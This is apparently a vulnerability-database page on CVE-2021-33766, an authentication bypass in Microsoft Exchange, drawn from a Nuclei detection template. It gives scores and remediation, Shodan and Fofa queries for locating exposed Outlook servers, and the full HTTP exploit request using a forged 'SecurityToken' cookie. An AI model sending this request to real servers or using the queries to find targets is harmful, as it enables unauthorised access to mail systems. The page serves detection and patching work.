🔙 목록으로 돌아가기

CVE-2021-33766: Microsoft Exchange - Authentication Bypass

TitleMicrosoft Exchange - Authentication Bypass
Authordaffainfo
SeverityHigh
ImpactUnauthenticated attackers can bypass authentication using a SecurityToken cookie, gaining access to Exchange Server's internal API endpoints and sensitive information.
RemediationApply security updates provided by Microsoft to fix the authentication bypass vulnerability.
CVSS Score7.3
EPSS Score0.93483
CVE IDCVE-2021-33766
CWE IDNVD-CWE-noinfo
Shodan Queryvuln:cve-2021-26855http.favicon.hash:1768726119http.title:"outlook"cpe:"cpe:2.3:a:microsoft:exchange_server"
Fofa Querytitle="outlook"icon_hash=1768726119
Tags cve cve2021 microsoft exchange auth-bypass kev vkev vuln

🔍 Vulnerability Description

Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server’s internal.

🌐 HTTP Request

GET /ecp/finlNY@SoFZp.com/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Cookie: SecurityToken=x
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-33766.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-33766.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A